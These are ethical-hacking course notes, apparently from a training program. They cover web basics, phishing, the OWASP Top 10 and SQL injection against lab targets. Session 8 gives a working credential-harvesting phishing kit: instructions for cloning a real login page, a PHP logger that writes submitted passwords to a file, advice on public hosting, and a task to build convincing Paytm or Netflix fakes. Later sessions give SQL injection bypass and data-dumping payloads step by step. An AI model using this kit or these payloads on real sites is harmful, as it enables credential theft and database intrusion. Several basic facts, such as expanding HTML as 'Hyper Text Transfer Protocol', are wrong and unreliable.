1043 SESSION 7
1044 =========
1045
1046WEB ARCHITECTURE AND COMPONENTS
1047===============================
1048
10491. Domain Name : It is a unique identity in the Form of name which can accessable globally. eg. google.com , google.com is a unique identity which helps in accessing the website.
1050
10512. Web Hosting Space : The space where we want to build and produce our web application. Eg. GoDaddy, BigRock
1052ICANN provide these hosting spaces to Godaddy etc.
1053
10543. Operating Systems : On which Operating System we want to build our website. Eg. Linux, Windows
1055
10564. Server Type : Which type of server we are using to host our website. Request and Response of the application.
1057 Windows - IIS - Information Serever
1058 Linux - Apache Tomcat
1059
10605. Web Technology : Which type of Web Technology we are using to create our WEbsite. THese are thge programming languages on wehich we create ouir web application.
1061
1062 1. Client Side Scripting Language : Which is used to develop the Front End Application and the user only accessing the control menu of that Programming Language.
1063 Eg. HTML , Java etc.
1064
1065 2. Server Side Scripting Language : THese are those languages which are used for creating and maintaing server side configuration of a website.
1066 Eg. PHP, ASP, JSP, PYTHON etc.
1067
1068Server is OS which always responds to the requests of clients.
1069Clients are those which only requests to the server.
1070
10716. Database : Database is that system which stores all the data of a web application we are hosting in a server. It is known as the backbone of the web application. Where data is stored in the form os Rows and columns.
1072It helps in storing all the files situated in a database.
1073Windows - MSSQL
1074Linux - MySQL, PostgreSQL
1075
1076SQL - Structured Query Language which helps us creating a Database in a Server.
1077
1078BUt these all resources needs money and finance.
1079
1080-------------------------------------------------------------------
1081
1082Local Hosting
1083=============
1084Local Hosting is a technology in which we stores and hosts a Database in our "localhost" Computer. This website can be hosted and accessed in a LAN or a Intranet Network.
1085
1086LOCAL HOST SERVERS
1087==================
1088So, they are Server applications which makes our normal operating system and make them act like a server.
1089
1090WINDOWS - WAMPP
1091
1092W - WINDOWS
1093A - APACHE
1094M - MSSQL
1095P - PERL
1096P - PYTHON
1097
1098LINUX - LAMMP
1099
1100L - LINUX
1101A - APACHE
1102M - MYSQL
1103P - PERL
1104P - PYTHON
1105
1106XAMPP - Cross Platform Server
1107X - Cross Platform
1108A - APACHE
1109M - MYSQL
1110P - PERL
1111P - PYTHON
1112
1113
1114------------------------------------------------------------------
1115
1116WEB SECURITY MISCONCEPTIONS
1117===========================
1118
1119HTTP / HTTPS - SSL Secured = Secure Socket Layer
1120 Encryption
1121 Tunneling
1122 Secure Socket
1123
1124= If a Website is using https instead of http, its not secured either.
1125= If I am using a Good Firewall than I am secured.
1126= If I am using IDS and IPS the I am secured.
1127 IDS = Intrusion Detection System
1128 IPS = Intrusion Prevesion System
1129------------------------------------------------------------------
1130
1131
1132SCRIPTING LANGUAGES
1133===================
1134
1135Methods used in Scripting Languages
1136===================================
1137
11381. GET = It shows Data which is being traveled from Server to Clients in the URL only. It is the unsecured method of data travelling between client and server.
1139
11402. POST = It doesn't show anything in the URL that fromwhere that data is travelling.
1141
1142
1143
1144
1145Client Side Scrippting
1146======================
1147The scripting programming language we are gonna be using is HTML.
1148
1149HTML
1150====
1151Hyper Text Transfer Protocol
1152 ||
1153Hyperlinks
1154
1155
1156This is the application used for creating client side web pages.
1157
1158HTML PRACTICALS
1159================
1160
11611. Starting of html scripting
1162<html>
1163...
1164... Tell me the code written is in HTML
1165...
1166</html>
1167
1168<head>
1169..
1170.. It is used to define the header like title of the web page,name in the tab
1171</head>
1172
1173<title> ......
1174Name of the Title
1175...</title>
1176
1177<body>
1178...
1179... Used for the content of the web page
1180...
1181</body>
1182
11835. Heading = Used to provide the heading
1184<h1> - <h6>
1185As the number increases the font size decreases.
1186<h1>Heading</h1>
1187<h2>Heading</h2>
1188<h3>Heading</h3>
1189
1190
1191HTML TAGS
1192=========
1193
1194<p> = Paragraph
1195<br> = Break Statement
1196<ul> = Helps in indentation
1197<ahref> = Action Hyperlink Reference
1198<b> = Bold
1199<btn> = Button
1200<a> = Action
1201<li> = Line
1202<ol> = orderdered indentation
1203<h1> = Heading
1204<imgsrc> = Image Source
1205<form action> = Form Clicking Action
1206
1207
1208
1209Basicpage.html
1210==============
1211<html>
1212<head>
1213<title>Basic</title>
1214</head>
1215<body>
1216<a href="http://www.lucideus.com"><h1>Ethical Hacking</h1></a>
1217<h2>Black Hat Hacker</h2>
1218<p>These are the bad guys.<br>
1219They Just Work For money.<br>
1220They bring chaos to the cyber world.<br>
1221Very Very Bad guys.</p>
1222<h2>White Hat Hacker</h2>
1223<h3>Script Kiddies</h3>
1224<h3>N00bZ</h3>
1225<img src="pooh.jpg">
1226<form action="secpage.html">
1227First Name: <input type="text"><br>
1228Last Name : <input type="text"><br>
1229Username : <input type="text"><br>
1230Password : <input type="password"><br>
1231<input type="submit" value="submit">
1232</form>
1233</body>
1234</html>
1235
1236=============
1237Secpage.html
1238=============
1239<html>
1240<head>
1241<title>Welcome</title>
1242</head>
1243<body>
1244<h1>Hello user, you are welcome to my web site</h1>
1245</body>
1246</html>
1247
1248-------------------------------------------------------------------------------------
1249
1250Server Side Scripting
1251=====================
1252
1253This language is only used to maintain and coonfigure Server Side Scripting. eg. PHP
1254
1255XAMPP Server Practical Steps
1256============================
1257
1258= After installing,
1259= Start apache
1260= Start MySQL
1261
1262There are 3 ways for opening a server hosted file
1263c:\xampp\htdocs
1264The file which I want to host, I will place it in htdocs folder.
1265
12661. localhost/filename.html
12672. 127.0.0.1/filename.html
1268For opening the same file in other devices which are connected in LAN
12693. IP Address/filename.html
1270
1271
1272PHP
1273===
1274<?php = Showing the starting of a php code
1275?> = It is the end of the php code
1276$ = to create a variable
1277
1278 $_GET
1279 $_POST
1280
1281
1282variable is a datatype in which we are stroring a value.
1283 $number = It is a variable and I can store anything in it.
1284 For Printing = "echo"
1285 echo "Welcome to Kartik and Sairam"
1286
1287-----------------------------------------------------------------------------------------
1288
1289Program of Addition of two numbers Through PHP and HTML
1290=======================================================
1291
1292HTML CODE =
1293
1294<html>
1295<head>
1296 <title>Hello</title>
1297</head>
1298<body>
1299 <form action=calcc.php method="post">
1300 First Number <input type="text" name="first" id="first"><br>
1301 Sec Number <input type="text" name="sec" id="sec"><br>
1302 <input type="submit">
1303 </form>
1304</body>
1305</html>
1306
1307PHP CODE =
1308
1309<html>
1310<head>
1311 <title>add</title>
1312</head>
1313
1314<body>
1315 <?php
1316$one = $_POST['first'] + 0;
1317$two = $_POST['sec'] + 0;
1318$sum = $one + $two;
1319echo "The sum is";
1320echo $sum;
1321 ?>
1322</body>
1323</html>
1324
1325------------------------------------------------------------------------------------------
1326
1327TASK
1328=====
1329
13301. To make a Calculator for Addition, Subtraction, Division, Multiplication in HTML and PHP.
13312. Cookboke of HTML and PHP including 30 HTML Tags and 20 PHP Tags with all there functionalities.
13323. To create a Simple Resume in HTML with proper Indentation.
1333
1334------------------------------------------------------------------------------------------
1335
1336
1337
1338 SESSION 8
1339 =========
1340
1341PHISHING ATTACKS
1342================
1343Phishing is a type of attack where a Attacker creates a Malicious web page globally hosted or locally hosted which seems legit/normal/original but makes for “phish” ie, lure the Victim making him/her to enter the sensitive or critical data which can be of any type eg. personal or financial and with the help of Phishing Attack.
1344
1345CREATION OF A PHISHING WEBPAGE
1346===============================
1347Workflow:
1348= Opening any Social Networking Website and copy its Source Code - The Scripting Code of the Web Page.
1349= Creating a PHP Page for getting the Data from the Phishing Page.
1350= A text file to store the data of the Phishing page.
1351
1352Steps :
1353=======
1354
1355= Open Any Legitimate Website and Right Click on it.
1356= Go to the “View Page Source” option.
1357= Copy The Source Code and Paste it In a Notepad File.
1358= Find "Action=" (Action defines the next location the data has to go)
1359= Replace The Field In The Above Step With Post.php
1360= Save As the Copied File as webpage.html
1361=Create A Post.php File for saving the data we get from the Phishing Page entered by the Victim and create a new text file through it for saving all the Data..
1362= Save Both The Files In the Localhost Server.=
1363
1364Creation of Post.php
1365=====================
1366<?php //starting of a php code
1367header ('Location: https://www.facebook.com'); //redirection to the original webpage
1368$handle = fopen("log.txt", "a"); //Creating a text file log.txt to store data & append it
1369foreach($_POST as $variable => $value) { //running of a loop until we didn’t get the value
1370 fwrite($handle, $variable); //Writing the Variable Name
1371 fwrite($handle, "="); //To define the value of Equals to.
1372 fwrite($handle, $value); //For writing the Username of the data
1373 fwrite($handle, "\r\n"); //For creating a New Line and Returning the value
1374} // end of loop
1375fwrite($handle, "\r\n"); //For creating a New Line and Returning the value
1376fclose($handle); //saving and closing the file named log.txt
1377exit; // Exiting the PHP code
1378?> // End of the PHP Code
1379
1380
1381Saving the Web Phishing Code and the Post.php in a same location in a folder inside the Localhost server.
1382
1383These Phishing Pages can be globally hosted via 000webhost.com and other open source servers also.
1384----------------------------------------------------------------------------------------------------------------------------
1385
1386SOCIAL ENGINEERING
1387==================
1388Social Engineering is a term usually called for “Hacking done via Human Minds”.
1389This is an art of Manipulating human minds so that they can spit out the Confidential Information. These types of Information can be any Personal or Financial Information. This attack can only be possible through “Human Stupidity”.
1390Phishing is a sub-category of Social Engineering.
1391
1392Youtube Video for Social Engineering : https://www.youtube.com/watch?v=lc7scxvKQOo
1393Social Engineering Free Pizza → https://www.youtube.com/watch?v=z68gZJwdAAg
1394
1395
1396----------------------------------------------------------------------------------------------------------------------------
1397
1398Email Encryption
1399=============
1400What is encryption?
1401Encryption is a Method which converts Plain Text Data which can be readable and understand into a unreadable form of data which is Encoded and cannot be easily readable by humans.
1402
1403Email Encryption : When we use the service of SMTP and sends a Email to another person, it uses End to End Encryption Method which is having some Public Key, Private Key and some Algorithms.
1404
1405Public Key is that which can be easily accessible from a CA Server. A Private Key is that which our Authentication Server of the Web Service generates and it merges with the Public Key to Complete the Encryption Process. The algorithm defines the functionality by which a Encryption Method Works.
1406
1407PGP - Pretty Good Privacy
1408====================
1409Pretty Good Privacy or PGP is a popular program used to encrypt and decrypt email over the Internet, as well as authenticate messages with digital signatures and encrypted stored files. This encryption format developed by PGP is used by Emails and applications like Whatsapp nowadays which provides end to end security.
1410
1411Website - https://encipher.it/
1412
1413
1414IDN Homograph Attack
1415=================
1416
1417A IDN homograph attack is based on standards of modern Internet that allows us to communicate in various multiple languages provided all over the globe. Different languages may contain different but very similar characters. So a Attacker lures and pranks with a Victim by these languages. Eg of Languages - Cyrillic Characters
1418
1419- https://www.irongeek.com/homoglyph-attack-generator.php
1420
1421What a Attacker can do?
1422===================
1423Attackers can register their own domain names that are similar to the existing web addresses.
1424Then they can create their own websites that are, again, the same or very similar to the existing original sites (that usually belong to banks, corporations, email or news services).
1425
1426----------------------------------------------------------------------------------------------------------------------------
1427
1428Spear Phishing
1429===========
1430Spear Phishing Attacks are those in which a Attacker customize their attack emails with the target’s name, position, company, work phone number and other information in an attempt to trick the recipient into believing that they have a connection with the sender.
1431The goal is the same as normal phishing which is luring the targeted victim into clicking on a malicious URL or email attachment, so that they will hand over their personal data.
1432
1433Eg. Mail from your Boss of your company.
1434
1435- Alchemist
1436----------------------------------------------------------------------------------------------------------------------------
1437
1438Fake Emails
1439=========
1440A fake email means a email generated by fake dummy server from which a attacker can generate there email and customize it to lure and attracts a Victim for Spear Phishing and other activities.
1441
1442Website - https://emkei.cz/
1443
1444----------------------------------------------------------------------------------------------------------------------------
1445Emails Tracing and Tracking
1446=====================
1447Demo of whoreadme.com
1448Demo of IP Grabber
1449http://www.fuglekos.com/ip-grabber/index.html
1450https://grabify.link/
1451http://whatstheirip.com
1452------------------------------------------------------------------------------------------------------------------------------------
1453
1454TASK
1455=====
1456 Create a phishing website for paytm cashback/linkedin/netflix/amazon prime video and host the same in localhost which will be convincing to your trainer.
1457
1458
1459
1460 SESSION 9
1461 =========
1462
1463INTRODUCTION TO VAPT
1464====================
1465
1466Let us First understand what does these 4 words mean -
1467
1468Vulnerability : These are the loopholes, mistakes, security holes, security misconfiguration which leads a attacker to know that this target is weak.
1469Assessment : Assessment simply means Analysis and to examine the Vulnerability which helps a Attacker to mitigate and develop its attacking procedure and strategy.
1470Penetration : This means to attack and exploit a Vulnerable System which leads by the Vulnerability Assessment Report of the Target.
1471Testing : Testing means applying different different attacking processes which can lead to a successful attempt of the Attack.
1472
1473The Term VAPT are two Different Processes, VA and PT.
1474
1475VA : To just scan for loopholes and weak security points. In this phase we just scan for the devices, web application, server, network, website and database. We generate a report on the performed scan.
1476PT : To gain access into the scanned vulnerabilities. We just try to hack into the services, devices, web application, servers and databases via the scanned vulnerabilities.
1477
1478
1479Bug Bounty - https://www.bugcrowd.com/bug-bounty-list/
1480
1481-------------------------------------------------------------
1482
1483INTRODUCTION TO WEB SECURITY STANDARDS - OWASP TOP 10
1484======================================================
1485
1486OWASP
1487=====
1488OWASP stands for Open Web Application Security Program, is a no-profit organization and a community which focuses on the SEcurity of the WEb Application Vulnerabilities. It is a Web Application Security Standard Now which every organization follows.
1489
1490OWASP TOP 10
1491============
1492It is a list generated by Owasp Organization which carries all the TOP 10 vulnerabilities of Web Applications worldwide. The list of Top 10 Vulnerabilities updates in every 2-3 Years which contains all the most common Vulnerabilities founding out in the Web Applications and the Attackers are Exploiting them. So, on the basis of those Top 10 Attacks, they create a list known as OWASP TOP 10.
1493
1494
1495OWASP TOP 10 - 2013
1496====================
1497A1. INJECTION
1498=============
1499Injection is a attack vector in which a attacker insert some SQL queries in the input metod of the Web Applicatyion which helps in extracting the juicy data of the Website from the Database. Types of Injections are basically - Union Based, Blind Based, Stacked Query Based, Error Based, LDAP Injections etc.
1500
1501A2-Broken Authentication and Session Management
1502======================================
1503Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
1504
1505A3-Cross-Site Scripting (XSS)
1506=============================
1507XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
1508
1509A4-Insecure Direct Object References
1510====================================
1511A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
1512
1513A5-Security Misconfiguration
1514=====================
1515Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.
1516
1517A6-Sensitive Data Exposure
1518==========================
1519Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
1520
1521A7-Missing Function Level Access Control
1522========================================
1523Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization
1524
1525A8-Cross-Site Request Forgery (CSRF)
1526====================================
1527A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
1528
1529A9-Using Components with Known Vulnerabilities
1530=============================================
1531Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
1532
1533A10-Unvalidated Redirects and Forwards
1534==============================
1535Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
1536
1537
1538-------------------------------------------------------------
1539
1540INTRODUCTION TO DBMS
1541=====================
1542
1543Database
1544========
1545A database is a place in the backend where all the data get stored.
1546
1547
1548DBMS
1549====
1550DBMS stands for Database Management System is a program which manages the data incoming or outgoing, organizes it and provides ways for the data to be modified or extracted by users.The DBMS can Create, Insert, Modify, Delete and perform other operations on the Tables and Columns the Database we are operating on.
1551
1552Databases stores data in the Forms of Tables, Columns and Rows.
1553
1554Tables contains some columns having data and columns contains the rows having data.
1555
1556Eg. Employee Record
1557
1558Employee Name, ID , Contact number, email, address etc.
1559
1560---------------------------------------------
1561Name | EID | MOBILE NUMBER | EMAIL | ADDRESS |
1562----------------------------------------------
1563sairam|12|898776566|sairam@gmail.com|newdelhi|
1564----------------------------------------------
1565
1566Database only knows one language to communicate.
1567SQL - Structured Query Language.
1568
1569-------------------------------------------------------------
1570
1571SQL BASICS
1572==========
1573
1574SQL is the language in which a Database can communicate by creating , modifying or inserting any type of data. Structured Query Language works on the basis of queries.
1575
1576Queries are the commands used for creating, manupilating and deleting the data in the database.
1577
1578SQL QUERIES
1579===========
1580
1581= SELECT - extracts data from a database
1582= UPDATE - updates data in a database
1583= DELETE / DROP - deletes data from a database
1584= INSERT INTO - inserts new data into a database
1585= CREATE DATABASE - creates a new database
1586= ALTER DATABASE - modifies a database
1587= CREATE TABLE - creates a new table
1588= ALTER TABLE - modifies a table
1589= DROP TABLE - deletes a table
1590= SELECT * from trainees - Select everything from table name "trainees"
1591= WHERE - Showing the location of the data of the table,column etc.
1592
1593
1594= table_name : Table's Name
1595= column_name : Column's Name
1596= database() : Database's Name
1597= version() : Database's Version
1598
1599= orderby
1600= information_schema
1601= union select
1602= group_concat
1603
1604Practical Eg.
1605
1606Database = Lucideus
1607Table = Trainees
1608Columns = Name, Address, Age, Contact Details
1609
1610To Insert data in member table of lucideus database
1611
1612INSERT INTO `Trainees` (`Name`, `Address`, `Age`, `ContactDet`) VALUES ('Sairam ', 'New Delhi', '23', '998897363');
1613
1614------------------------------------------------------------
1615
1616
1617 '
1618
1619LVS SETUP AND CONFIGURATION
1620============================
1621
1622LVS stands for Lucideus VAPT Simulator. It is a vulnerable web application created in html, php, css, sql and js which have all the major vulnerabilities practicals to let the user understand that what is the attack vector in this.
1623
1624We have to host lvs in our localhost xampp server.
1625
1626Setup and Configuration
1627=================
1628Copy zip file into C:\xampp\htdocs
1629Right click the zip file, click on extract here
1630start xampp server, start apache and mysql
1631Open the browser, goto 127.0.0.1/lvs
1632It will show you a message “Click here to create the Database”.
1633After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.
1634Go through the Instruction Page of LVS and then start learning through it.
1635
1636
1637-------------------------------------------------------------
1638
1639
1640
1641SQL INJECTION AUTHENTICATION BYPASS
1642====================================
1643
1644Attack Vector :
1645To log in as an administrator, when you are just a simple user not administrator.
1646To log into someone's account without the need of any username and password.
1647
1648= OR GATE
1649= TAUTALOGY CONNDITION , WHERE ALL THE THREE VALUES ARE 1.
1650
1651
16521 --> true
16530 --> false
1654
1655Logic Gates
1656=========
1657
1658OR GATE : if any of the value is true or 1, the answer will always be true or 1
1659
1660 A | B | Resultant
1661 ------------------------
1662 0 | 0 | 0
1663 ------------------------
1664 1 | 0 | 1
1665 ------------------------
1666 0 | 1 | 1
1667 ------------------------
1668 1 | 1 | 1
1669
1670
1671
1672 1'or'1'='1
1673
1674 1 : True - Administrator
1675
1676
16771'or'1'='1 : True - Administrator
1678x’or’x’=’x : True - Administrator
1679
1680
1681Database portal scenario of authentication
1682
1683 Username : 1'or'1'='1
1684 Password : 1'or'1'='1 Administrator Access
1685
1686
1687 Username : admin'or'1'or'1'='1
1688 Password : admin'or'1'or'1'='1 Administrator Access
1689
1690
1691-------------------------------------------------------------
1692
1693testing website - demo.testfire.net, testphp.vulnweb.com
1694
1695---------------------------------------------------------------
1696
1697
1698
1699 SESSION 10
1700 ==========
1701
1702METHODS USED IN WEB APPLICATIONS
1703================================
17041. GET - It is the method used by web applications which is unsecure and show all the transmitting data from the web application UI to its Database or server. Requests data from a specified resource.
1705eg. php?id=1, ?cat=54, ?test=query.
1706
17072. POST - The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php
1708
1709----------------------------------------------------------
1710
1711INSECURE DIRECT OBJECT REFERENCE
1712================================
1713A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, Attackers can directly access the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.
1714
1715For eg. :
1716
1717CHJM Website :
1718
1719Accessing into another user -
1720www.chjm.org/login/.../php?id=alex
1721www.chjm.org/login/../php?id=logan ( entered into Logan's Account)
1722
1723
1724Accessing into pages which are not authorized to a basic user-
1725www.chjm.org/user+profile -- /../settings/config.html
1726
1727www.chjm.org/login/../php?id=logan/settings/config.html
1728
1729
1730- Demo in WAVE.
1731
1732-------------------------------------------------------------------------------------------
1733
1734SENSITIVE DATA EXPOSURE
1735=======================
1736Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.
1737
1738Types of Sensitive Data
1739=======================
1740
17411. Personal - Names, Address , Contact Numbers etc.
17422. Confidential - ID,Passwords - Credentials, Aadhar No.
17433. Financial - Bank Accounts numbers, credit cards, debit cards etc.
17444. Health Information - Policies, insurances etc.
1745
1746Demonstration on LVS.
1747
1748----------------------------------------------------------
1749
1750DVWA SETUP AND CONFIGURATION
1751============================
1752DVWA stands for Damn Vulnerable Web Application, it is PHP MySQL based Web Application which is a organisational based understanding Web Application fopr OWASP TOP 10 like LVS.
1753
1754STEPS
1755=====
1756Copy zip file into C:\xampp\htdocs
1757Right click the zip file, click on extract here
1758start xampp server, start apache and mysql
1759Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and make password=””(empty).
1760Open the browser, goto 127.0.0.1/dvwa
1761It will show you a message “Click here to create the Database”.
1762After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.
1763Go through the Instruction Page of LVS and then start learning through it.
1764
1765----------------------------------------------------------
1766
1767OWASP A1. INJECTIONS
1768=====================
1769
1770UNION BASED SQL INJECTION
1771=========================
1772UNION BASED SQLI is a type of attack vector in which a attacker inputs some kind of SQL Synatxes in a Input Method of a Web Application UI, And he/she can be able to communicate and access the Database.
1773The attacker extracts the data through inputting some SQL Queries into the Web Application UI and henced get the “Juicy” Data from Database -> Tables -> Columns -> Rows
1774
1775TERMINOLOGIES
1776=============
17771. Information Schema : It has all of the data regarding every databases, tables, columns and every other detail of a Database. It is considered as the mother of Informations in Database.
17782. --+ : Everything written with --+ would be acted like a SQL QUERY.
17793. # : Everything entered after # will not be considered.
17804. database() - name of the database
17815. version() - version of the database.
1782
1783column_name
1784table_name
1785
1786= order by - sorts the entry way or known as entities of the database.
1787= union select - it carries out more than one data in a executive manner.
1788 join + extract
1789= group_concat - group the data and add them.
1790 concatenation = addition
1791
1792
1793
1794Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/
1795
1796STEPS - For SQLi always recommend to use Firefox, as special symbols and spaces does not get converted into URL encode
1797
1798STEPS
1799======
1800
1801Step 1: To find the GET Method/Parameter
1802 eg. php?id=1
1803 ?cat=24
1804 ?test=query
1805Trying to click each and every possible link or will give inputs to the search boxes of GET Method.
1806
1807 “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#”
1808
1809
1810Step 2: Check if my site is Vulnerable or not to Union Based SQLI
1811 ?id=1'
1812 php?id=1'
1813If we get an error that means my website is vulnerable to Union Based SQLI.
1814
1815It will give - “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
1816You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 “
1817
1818
1819Step 3: To check the number of columns present in the database
1820 order by 100--+
1821 order by 200--+
1822 order by 300--+
1823 Until we get an error of “Unknown Order Clause”.
1824
1825Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
1826 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
1827 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
1828Unknown column '3' in 'order clause'
1829
1830
1831Step 4: To Union Select the columns which are present in the Database and is Vulnerable
1832 union select 1,2--+
1833
1834http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#
1835
1836
1837Step 5: Extracting Information from Database
1838 - database()
1839 - version()
1840 - union select version(),2--+
1841 - union select 1,version()--+
1842
1843 - union select all 1,version()--+ : 10.1.25-MariaDB
1844 - union select all 1,database()--+ : dvwa
1845
1846Step 6: Calling the Mother of Database - information_schema
1847
1848= Extracting Table Names
1849 - union select all 1,table_names from information_schema.tables--+
1850
1851http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#
1852
1853= After Selecting a Juicy Table, Extracting data of that table :
1854 - column_name, information_schema.columns
1855
1856 - union select all 1, columns_name from information_schema.columns where table_name="users"--+
1857
1858= To get the data from columns (user, password)
1859
1860 - union select user,password from users--+
1861 - http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' group_concat(user,0x0a,password),2 from users--+
1862
1863And we will get the Juicy Data.
1864
1865-------------------------------------------------------------------------------
1866
1867TESTING WEBSITES
1868================
18691. http://demo.testfire.net/
18702. http://testphp.vulnweb.com/
1871
1872
1873TASKS
1874=====
18751. What is the Meaning of % in URL?
18762. What is WAF?
1877
1878-------------------------------------------------------------------------------
1879
1880
1881
1882 SESSION 11
1883 ==========
1884
1885ERROR BASED SQL INJECTION
1886==========================
1887
1888Error based SQL Injection is type of SQL Injection technique to make the error message show Data in just the form of Database Errors instead of SQL Syntax error like in Union Based, for when we have a blind vulnerability that shows error, so we can extract sensitive data from the database directly.
1889
1890The errors are very useful during the time of development of a web application but they should be disabled on a Live Website, because errors always shows the Internal Sensitive Data of the Database.
1891
1892Error Based SQL Injection works on the ASP Technology (asp.net , aspx) which is a open source server side web application Developed by Microsoft, using the Microsoft MSSQL Server.
1893
1894
1895TRUE CONDITION :
1896---------------
1897
1898Here 1 is True and 0 is False.
1899
1900AND GATE REPRESENTATION
1901
1902A | B | Resultant |
1903------------------------------|
19040 | 0 | 0 |
19050 | 1 | 0 |
19061 | 0 | 0 |
19071 | 1 | 1 |
1908
1909Checking the Last True Condition it states :
1910
19111 & 1 = 1 ie; 1*1=1 or True*True = True
1912
1913MAKING THIS TRUE CONDITION FALSE
1914
19151 & 0 = 0 ie; 1*0=0 or True*False = False
1916
1917
1918Error Based SQL Injection works by generating a error condition in the SQL Syntax, so that the Database reverts back with the Error along with the Sensitive Data.
1919
1920
1921DEMONSTRATION
1922===============
1923
1924Normally a SQL Syntax can goes like :
1925
1926bhai.com/account.aspx?id=10 | ?id=10 and 1 =1 ; //TRUE
1927Which means a Condition is true and it will revert a Genuine Website.
1928
1929- So, we can change and can create a Error in the SQL Command by :
1930 ?id=10 and 1=0; //FALSE
1931Which will create and revert a Errors of the Database.
1932
1933
1934
1935------------------------------------------------------------------
1936
1937
1938CONDITIONS OF ERROR BASED SQLI
1939===============================
1940= Only One Query can execute at a Particular time, not like finding out the database and versions etc we do on Union Based.
1941= It works on the basis of Last In First Out (LIFO).
1942= Only the Top Table of the Database can be accessed at a single particular time. Same goes for Columns and then for Rows.
1943
1944-----------------------------------------------------------------
1945
1946
1947STRUCTURE OF LAST IN FIRST OUT TABLES :
1948
1949 |----------------|
1950 |Others | Others will be lastly added and
1951 |----------------| firstly out. If you want to get the
1952 |Guestbook | data of "Users", you have to go
1953 |----------------| through "Others" and "Guestbook"
1954 |Users |
1955 |----------------|
1956 |Images |
1957 |----------------|
1958
1959------------------------------------------------------------------
1960
1961
1962First as same as Union Based SQLI, we start finding the number of columns and the Vulnerable column. Suppose the vulnerable column is 10.
1963
1964After creating a Error, We will start executing the command and extracting the data from the First Table from the Database.
1965
1966For selecting the Top First Table (Cause we cannot directly go a “n” number column/table),
1967
1968= IS USED FOR A COMMAND.
1969
1970= bhai.com/account.php?id=10 and 1=0 select top 1 table_name from information_schema.tables--+
1971
1972This will extract and give the Data of the First Table from the Database Including its name and other entities. If the Data is Juicy then extract it, else we go for the next tables and columns.
1973
1974----
1975
1976For deselecting the Top/Current Table and selecting/extracting the next table,
1977
1978= bhai.com?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“Name of the previous tables”)
1979
1980Here we are selecting the next Top Table excluding the Previous one and then extracting its data through the Database Errors. For eg. if the First Top Table is named as “Others”, the query will be :
1981?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“others" , "guestbook")--+
1982
1983--------
1984
1985After getting through our Juicy Table, we go for the data which are situated in there columns.
1986
1987= ?id=10 and 1=0 select top 1 column_name from information_schema.columns where table_name not in (“others”, "guestbook")
1988
1989and column_name not in ("Previous Column Name")
1990
1991Here we get the data extracted of the Columns which are not of the Table named "Others" and "Guestbook".
1992
1993
1994------------------------------------------------------------------
1995
1996
1997STACKED QUERY SQL INJECTION
1998============================
1999
2000Stacked Query SQL Injection is the one which can execute by terminating the original query and adding a new one, it will be possible to modify data and call stored procedures like creating, deleting and modifying the Database with there entities. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.
2001
2002This can done by SQL Injection Automated Tools like “SQLMAP” etc like "Hackbar".
2003
2004https://www.youtube.com/watch?v=6cd4xY9_DNA
2005
2006SQLMAP
2007=======
2008SQLMAP is an open source python based penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many features lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
2009
2010DEMONSTRATION ON KALI LINUX
2011============================
2012SQLMAP is a CLI Based Tool which only runs on the Terminal of Kali Linux. Further are the steps to use this automated tool.
2013
2014Target : DVWA , http://testphp.vulnweb.com/
2015
2016First Step is finding a GET Method in a Web Application, and then further enumerating it through sqlmap.
2017
2018= Commands goes with this.
2019
2020= sqlmap
2021
